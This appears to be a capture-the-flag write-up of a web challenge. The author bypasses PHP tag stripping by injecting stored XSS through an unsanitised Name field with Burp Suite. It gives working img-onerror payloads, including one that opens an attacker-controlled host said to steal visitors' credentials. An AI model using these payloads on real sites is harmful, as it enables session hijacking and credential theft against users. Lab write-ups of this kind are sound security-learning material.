### Objective

Redirect everyone to a web page of your choosing.

Let's try some basic inputs
```html
<h1>hello</h1>
```
Looks like it's html tags are not rendering? Let's view the source.
So looks like it's using the striptags function in php to remove tags and addslashes to avoid sql injection and XSS. I tried crafting my payloads using PayloadsAllTheThings but none of them worked so.

Next, I tried the Name field since it isn't being sanitized with XSS and SQLI protection.
But if you try to write the full script in the Name field you can't. So I'll be using BurpSuite for this. Let's try the same payload since script tags don't work in the name field
```html
<img src=# onerror=alert(1);>
```
And it works!
Now let's make a malicious redirect to our website that is stealing cookies.
```html
<img src=# onerror=window.open('http://ip:8001');>
```
Now when the script is executed, it will open a tab to my page and I set up a script there to steal credentials.